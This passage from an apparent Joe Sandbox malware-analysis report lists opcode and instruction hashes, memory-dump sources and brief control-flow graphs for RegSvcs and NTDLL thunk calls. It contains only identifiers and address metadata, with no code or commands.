                                                                        • Opcode Fuzzy Hash: b708bce7c1d429f8ee8ba37e1de4f249939eb5518d44c66d8e2824a4c3d37066
                                                                        • Instruction Fuzzy Hash: 92E04F79914208FBCB04EFA4D8459ACFB79EB45301F64C0A9ED0817350D732AE52DB80
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.1597766966.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_8f80000_cQwRvD.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a8ab739f8e0cd5cee9d640929f47f55f83f36fbb6806b1545b348d22963c412b
                                                                        • Instruction ID: d92b926393cbc422befc1ded81878bbe81dd396afaafb756fc774eadfb880c1f
                                                                        • Opcode Fuzzy Hash: a8ab739f8e0cd5cee9d640929f47f55f83f36fbb6806b1545b348d22963c412b
                                                                        • Instruction Fuzzy Hash: 99E01A75D04249EFCB54DFA8D5416ACBBF0EB45225F3482D9986897391C7325A43DB40
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.1597766966.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_8f80000_cQwRvD.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2c0119dbc47faf08ae996209a20e76e60691596772f48091760509f57dab609c
                                                                        • Instruction ID: c45810f5caf7fcf417e0f0af6f6fc7813ed876db1a512bd324230aab2db24d89
                                                                        • Opcode Fuzzy Hash: 2c0119dbc47faf08ae996209a20e76e60691596772f48091760509f57dab609c
                                                                        • Instruction Fuzzy Hash: 61E01272805209EFCB10EFB5D5057AE7BFCEB4A202F2448A5D50993151EF715E05EBA1
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.1597766966.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_8f80000_cQwRvD.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: bb648b74f11550175cbf2edb70b73a9caf6345605ab9892df180d21e65972e6a
                                                                        • Instruction ID: 65b38849eb106bc28a6226fb225712248aa5a5257a6dfe6ca90be3b253ed1524
                                                                        • Opcode Fuzzy Hash: bb648b74f11550175cbf2edb70b73a9caf6345605ab9892df180d21e65972e6a
                                                                        • Instruction Fuzzy Hash: 31E01A74E04208EBCB04DFA8D5416ACBBF4EB49200F2080A9D80897340C672AE42CB40
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.1597766966.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_8f80000_cQwRvD.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6e7ea43344505323eba26a28542ce19afe7b0ed207fc2f41e6fcc81e0d4a17f4
                                                                        • Instruction ID: 6ff151ff19ee3ee6f9c153d24a1441b5bb805785360aabea408c4fcaef1ca4db
                                                                        • Opcode Fuzzy Hash: 6e7ea43344505323eba26a28542ce19afe7b0ed207fc2f41e6fcc81e0d4a17f4
                                                                        • Instruction Fuzzy Hash: 8BE0C275959205EFC304CFB0DA42B787B74AB86205F2480EAC8094B3D2DB739D02CB81
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.1597766966.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_8f80000_cQwRvD.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 493f8c35216d896287d648a07fbf2324cce023e1879de58a85120f30ea1f15ec
                                                                        • Instruction ID: 1fd6910fccb74bff7e62c416897a245db32fb51ebc11af6b9347817009bd8717
                                                                        • Opcode Fuzzy Hash: 493f8c35216d896287d648a07fbf2324cce023e1879de58a85120f30ea1f15ec
                                                                        • Instruction Fuzzy Hash: 91E01275D08208EBC704EFA8E5425ACBBB8EB46316F34819DD80927341CB326E43DB85
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.1597766966.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_8f80000_cQwRvD.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 493f8c35216d896287d648a07fbf2324cce023e1879de58a85120f30ea1f15ec
                                                                        • Instruction ID: b295f3937a0afe7ae6368ad93c733010cccb7709bdebe3cdf1d7f852d7d1e196
                                                                        • Opcode Fuzzy Hash: 493f8c35216d896287d648a07fbf2324cce023e1879de58a85120f30ea1f15ec
                                                                        • Instruction Fuzzy Hash: DEE01275D08208EBC704EFA4E55166CBBB8EB45315F24819DD80927341CB326E52DB85
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.1597766966.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_8f80000_cQwRvD.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 493f8c35216d896287d648a07fbf2324cce023e1879de58a85120f30ea1f15ec
                                                                        • Instruction ID: 95694840659229830c4f0a9c48e7a9807c96042d4c4baa362a0f8475426059e5
                                                                        • Opcode Fuzzy Hash: 493f8c35216d896287d648a07fbf2324cce023e1879de58a85120f30ea1f15ec
                                                                        • Instruction Fuzzy Hash: 82E01275D19208EFC704EFA4E58156CBBB8EB46305F7481BDD80967345CB326E42DB85
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.1597766966.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_8f80000_cQwRvD.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 71441a796319b8742456d2d27807d82285748ac934a5da3b84a2b512bfddad00
                                                                        • Instruction ID: 4886e2d9e45765d0b49248d06d0483623d734ca83711b33f631fd4fbb0bd05a6
                                                                        • Opcode Fuzzy Hash: 71441a796319b8742456d2d27807d82285748ac934a5da3b84a2b512bfddad00
                                                                        • Instruction Fuzzy Hash: A4E0B6B1D4020ADFDB40EFB9C945A5EBBF0BF08710F1185A9D019EB215E77496058F91
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.1597766966.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_8f80000_cQwRvD.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 664d88dde9efdb0d48f4c99ab25d0471f91c4608f5163300b757357ab35b15e8
                                                                        • Instruction ID: da0a24f25df57a4368cf81630fa67f84e3ac57802358068217828765a9cfcdc7
                                                                        • Opcode Fuzzy Hash: 664d88dde9efdb0d48f4c99ab25d0471f91c4608f5163300b757357ab35b15e8
                                                                        • Instruction Fuzzy Hash: 70E0E27181460CDE8B40FE79D5444AA7BE8AB15261F00CA2AE8099A110EB30D2D9DB81
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.1597766966.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_8f80000_cQwRvD.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 35b91479b1dc1380a8b72abfd70baa49c1ffb0eb35782da3a4f17700a96314ab
                                                                        • Instruction ID: c4c982a9d2369d0c3d9cdbb7ff51a4867543e994bafcf94b2076c104be532947
                                                                        • Opcode Fuzzy Hash: 35b91479b1dc1380a8b72abfd70baa49c1ffb0eb35782da3a4f17700a96314ab
                                                                        • Instruction Fuzzy Hash: CED0A771919108EBC704DFA4D441A69B7BCDB46245F6480ECD80D43381DB73AD02CB81
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.1597766966.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_8f80000_cQwRvD.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 036166adbf961bea3913e12148819b0e0ae6839c78b81670089d65f927bdd8c6
                                                                        • Instruction ID: 4acee6449e62937cc2e442a17414280016a2c8a3e0bc77f36f23f4b4761cf708
                                                                        • Opcode Fuzzy Hash: 036166adbf961bea3913e12148819b0e0ae6839c78b81670089d65f927bdd8c6
                                                                        • Instruction Fuzzy Hash: A0D0A7728A9B816FE3022BE4B40D3743F606F03202F0A0053F0596E3939B190545D766
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.1597766966.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_8f80000_cQwRvD.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4b00e9580491208debc63bdac1cb0a3daa767c26dc0b5e06b3be6f1376b485a9
                                                                        • Instruction ID: 9631163d5ad1a36d493bee45d278a1cabc6d3add5ac2a83a1d7b72051ee80fbf
                                                                        • Opcode Fuzzy Hash: 4b00e9580491208debc63bdac1cb0a3daa767c26dc0b5e06b3be6f1376b485a9
                                                                        • Instruction Fuzzy Hash: 7CD01776A4A218DFDB91AB24E8407E87B3AEF85215F0141D2D00D93225DF311ECACB02
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.1597766966.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_8f80000_cQwRvD.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ec1706008c37b1d0aa9226c1e64621cdd93bae695fdbcbb300fbd3097e0d23a9
                                                                        • Instruction ID: 8c4f1882e29c9096bc183612cd87527e72e43959fc00c7648ff058830e2a5fbf
                                                                        • Opcode Fuzzy Hash: ec1706008c37b1d0aa9226c1e64621cdd93bae695fdbcbb300fbd3097e0d23a9
                                                                        • Instruction Fuzzy Hash: 13D01770921308EBD704EFA8E5466ADBB76EB42302F6041AAD80427350CB315E84DB95
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.1597766966.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_8f80000_cQwRvD.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: af5db30be00a4f45beb49bdaa48b6098b700ada4d04e4a9d780c8fb5b425aa7c
                                                                        • Instruction ID: f691ecabae24b7cc3fabd274a5d9aef045e139cb2aabbd4d561f3adc38130833
                                                                        • Opcode Fuzzy Hash: af5db30be00a4f45beb49bdaa48b6098b700ada4d04e4a9d780c8fb5b425aa7c
                                                                        • Instruction Fuzzy Hash: 2AD0120A18F7C68FEB0B677488609443F700D2312934A00E3C180CE0A3C0A8494ED33B
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.1597766966.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_8f80000_cQwRvD.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 39756ab1d41e677abf3547cc0f3c935c5ba7c2b93b4d9b12f1e4908584f376ea
                                                                        • Instruction ID: 85db2726fb257b1077b7656d032f58e0cb0b1ce8058bb25b11c62e4ce6eb2a65
                                                                        • Opcode Fuzzy Hash: 39756ab1d41e677abf3547cc0f3c935c5ba7c2b93b4d9b12f1e4908584f376ea
                                                                        • Instruction Fuzzy Hash: A1D01237240208DE8B40FEF4EC00D567BDDBB18711B408462E504CB124E622E464D761
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.1597766966.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_8f80000_cQwRvD.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f4f3fc3dd34526850baf12c381b7b553087be3f2e7a0e65f5c9a64cfa037bc25
                                                                        • Instruction ID: 64532f401fb663f563352f67aa40cdbb26971ddd08529527dd3f4ef1be9914fb
                                                                        • Opcode Fuzzy Hash: f4f3fc3dd34526850baf12c381b7b553087be3f2e7a0e65f5c9a64cfa037bc25
                                                                        • Instruction Fuzzy Hash: DEC08C30034A0597E30077EDF50E3383EA95B02303F400013B10E127924F640400CA6A
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.1597766966.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_8f80000_cQwRvD.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 17f15bd70c35a650b0e8bc4053e4e7ab71c5619836f18650c676be42dc4a6531
                                                                        • Instruction ID: bc0a9e9a5b07bfd3176c05ed8da92c5c22655b0281fb4f75254e59524795f54e
                                                                        • Opcode Fuzzy Hash: 17f15bd70c35a650b0e8bc4053e4e7ab71c5619836f18650c676be42dc4a6531
                                                                        • Instruction Fuzzy Hash: 6EB0122F194341E2930872B48C88F2E7A11EBB6703B908C03774644040C531482DE51F

                                                                        Execution Graph

                                                                        Execution Coverage:0.1%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:5
                                                                        Total number of Limit Nodes:1
                                                                        execution_graph 62856 1182df0 LdrInitializeThunk 62858 1182c00 62860 1182c0a 62858->62860 62861 1182c1f LdrInitializeThunk 62860->62861 62862 1182c11 62860->62862

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 0 1182c0a-1182c0f 1 1182c1f-1182c26 LdrInitializeThunk 0->1 2 1182c11-1182c18 0->2
                                                                        APIs
                                                                        • LdrInitializeThunk.NTDLL(0119FD4F,000000FF,00000024,01236634,00000004,00000000,?,-00000018,7D810F61,?,?,01158B12,?,?,?,?), ref: 01182C24
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1758810218.0000000001136000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                                        • Associated: 00000011.00000002.1758810218.0000000001110000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001117000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001190000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001196000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.00000000011D2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001233000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001239000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_1110000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 6be6f1172b680e587512639fdb1a1fc43343166a54fd6db2e6d505164294d7ae
                                                                        • Instruction ID: e7f4d61e65c81b80bab9f237f4750aa9cc9bc76564ea464632f9ed30a0aefddf
                                                                        • Opcode Fuzzy Hash: 6be6f1172b680e587512639fdb1a1fc43343166a54fd6db2e6d505164294d7ae
                                                                        • Instruction Fuzzy Hash: FFB09B71D019C5C5DF16F7644708717790077D1701F25C061D2134645F473CC1D1E675

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 4 1182df0-1182dfc LdrInitializeThunk
                                                                        APIs
                                                                        • LdrInitializeThunk.NTDLL(011BE73E,0000005A,0121D040,00000020,00000000,0121D040,00000080,011A4A81,00000000,-00000001,-00000001,00000002,00000000,?,-00000001,0118AE00), ref: 01182DFA
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1758810218.0000000001136000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                                        • Associated: 00000011.00000002.1758810218.0000000001110000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001117000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001190000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001196000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.00000000011D2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001233000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001239000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_1110000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 64219fee77333a259f408d763f81a0787eccba63899a90f91f6c0b869c75a0c2
                                                                        • Instruction ID: c0c5458101673816b02ba26aa5e1acba579bbf911d0bf756699f354be363f8c4
                                                                        • Opcode Fuzzy Hash: 64219fee77333a259f408d763f81a0787eccba63899a90f91f6c0b869c75a0c2
                                                                        • Instruction Fuzzy Hash: C790023160140813D61571584604707000997D1241F95C412A0529558DD75A8A52A225

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 5 11835c0-11835cc LdrInitializeThunk
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1758810218.0000000001136000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                                        • Associated: 00000011.00000002.1758810218.0000000001110000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001117000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001190000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001196000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.00000000011D2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001233000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001239000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_1110000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 774690b69b33b97f2f5c4965475795bdebd26cebad3e38f4ddeefcc0e1412543
                                                                        • Instruction ID: c69c9fc33a7f4114a80cc5d3d98ced325acaacba2db3faa974abbb3cf96745a6
                                                                        • Opcode Fuzzy Hash: 774690b69b33b97f2f5c4965475795bdebd26cebad3e38f4ddeefcc0e1412543
                                                                        • Instruction Fuzzy Hash: 15900231A0550802D60471584614706100597D1201F65C411A0529568DC7998A5166A6

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 6 42e935-42e93d 7 42e8f9-42e8fb 6->7 8 42e93f-42e942 6->8 10 42e913-42e915 7->10 11 42e8fd-42e90b 7->11 9 42e943-42e96e 8->9 15 42e974-42e985 9->15 12 42e923-42e926 10->12 14 42e917-42e921 10->14 11->12 13 42e90d-42e912 11->13 13->10 14->12 16 42e927-42e92d 14->16 16->12 17 42e92f-42e933 16->17
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1758032478.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_42e000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f23161632fb5b3f3c493444c7e7a2074723b82a6fcf632197c1ffae55a7424ef
                                                                        • Instruction ID: ace196b2461c6c1bd2d875e8487279a7d84a016af01964a98343b282167b5eca
                                                                        • Opcode Fuzzy Hash: f23161632fb5b3f3c493444c7e7a2074723b82a6fcf632197c1ffae55a7424ef
                                                                        • Instruction Fuzzy Hash: 531152B52002199FDB45CE55E881AEB73A9AF48710B44816AF9188B341D774E990CB94

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 18 42e581-42e5a4 call 42ea73 21 42e5a9-42e5b0 18->21 22 42e5bf-42e5c4 21->22 23 42e5c6-42e5cf 22->23 24 42e61e-42e623 22->24 25 42e5de-42e5e3 23->25 26 42e5f6-42e61b 25->26 27 42e5e5-42e5ed 25->27 26->24 28 42e5f3 27->28 28->26
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1758032478.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_42e000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d471b4daf8821a44005f35bac5614195c06c134650c974fe7d0b1d6064a31efd
                                                                        • Instruction ID: 36010cf85de269a330a74318b7370a61f392f1002f3e6638b84986928a397ede
                                                                        • Opcode Fuzzy Hash: d471b4daf8821a44005f35bac5614195c06c134650c974fe7d0b1d6064a31efd
                                                                        • Instruction Fuzzy Hash: CA01D871D0022867FF64EB959C52FDD73B8AB04304F5002DAA60CA2182FFB4678C8A65

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 31 42e583-42e5c4 call 42ea73 35 42e5c6-42e5e3 31->35 36 42e61e-42e623 31->36 38 42e5f6-42e61b 35->38 39 42e5e5-42e5ed 35->39 38->36 40 42e5f3 39->40 40->38
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1758032478.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_42e000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1ab143658a79941cbbfda85d2c16fe54368d10f9503303fed53ef97c29afc7f1
                                                                        • Instruction ID: dc3e8d177bb842c3979ea6e6a987604fe14a5e1ac564dba5e79ce29406088d86
                                                                        • Opcode Fuzzy Hash: 1ab143658a79941cbbfda85d2c16fe54368d10f9503303fed53ef97c29afc7f1
                                                                        • Instruction Fuzzy Hash: 1F018871D5022867FF64EB959D52FDD73B8AB04304F5002DAA60CA2181FFB4679C8A65

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 43 42eaa9-42eac8 44 42eace-42ead5 43->44 45 42ead7-42ead9 44->45 46 42eae9-42eaec 44->46 45->46 47 42eadb-42eae7 call 42ea73 45->47 47->46
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1758032478.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_42e000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c85510444824a58254b8765055798e05a5d9782dd5e129e246536b075605c95c
                                                                        • Instruction ID: e57714a510b992dcf1b415ff8161f977a58e0f5afd61c147efbd3d2e3582b188
                                                                        • Opcode Fuzzy Hash: c85510444824a58254b8765055798e05a5d9782dd5e129e246536b075605c95c
                                                                        • Instruction Fuzzy Hash: CBE09276B4152027C620569AAC46F6BB76CAFC2B20F0D41B7FE0C5B241E6686840C2F9

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 50 42e943-42e96e 51 42e974-42e985 50->51
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1758032478.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_42e000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6a1e8ab1b6f2c79ffba9a1ec0332bc05f575c190be56660756c26d5b78e1c0be
                                                                        • Instruction ID: d2554d859463da610aabc1fde6e19503784a04a8efb212309120388786e4b453
                                                                        • Opcode Fuzzy Hash: 6a1e8ab1b6f2c79ffba9a1ec0332bc05f575c190be56660756c26d5b78e1c0be
                                                                        • Instruction Fuzzy Hash: 9BF098B6610209AFDB04CF59D881EEB73A9AB88650F04C569BD298B241D774EA50CBA4

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 52 42eab3-42eac8 53 42eace-42ead5 52->53 54 42ead7-42ead9 53->54 55 42eae9-42eaec 53->55 54->55 56 42eadb-42eae7 call 42ea73 54->56 56->55
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1758032478.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_42e000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e335e67f75993d97682cc43935a7343131bf71ceebcf805054258a935c5e48ca
                                                                        • Instruction ID: 1835675a84d1e23dd5a95dfa8d8ad343b0502b961825f32e2c7005a54a23b675
                                                                        • Opcode Fuzzy Hash: e335e67f75993d97682cc43935a7343131bf71ceebcf805054258a935c5e48ca
                                                                        • Instruction Fuzzy Hash: 7EE04876B4022437C520558B6C05FAB775C9BC1B60F4D0176FE0C57341D564A90082E8

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 59 42e9d3-42e9e6 60 42e9ec-42e9f0 59->60
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1758032478.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_42e000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 862cb582f55d554a97e4ffb2a8e013e9ed2c654007d7a577d9d703b3d8d9688a
                                                                        • Instruction ID: 8ba6edbe5e3470fc33e52b5cde441f923a7206675e3574fce1ef5207c09daee9
                                                                        • Opcode Fuzzy Hash: 862cb582f55d554a97e4ffb2a8e013e9ed2c654007d7a577d9d703b3d8d9688a
                                                                        • Instruction Fuzzy Hash: 65C080716503087FD700DB8DDC46F6633DC9708610F444055B90CCB341E570F9504754

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 61 1184a80-1184a8b 62 1184a8d-1184a99 RtlDebugPrintTimes 61->62 63 1184a9f-1184aa6 61->63 62->63 68 1184b25-1184b26 62->68 64 1184aa8-1184aae 63->64 65 1184aaf-1184ab6 call 116f5a0 63->65 70 1184ab8-1184b22 call 1171e46 * 2 65->70 71 1184b23 65->71 70->71 71->68
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1758810218.0000000001136000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
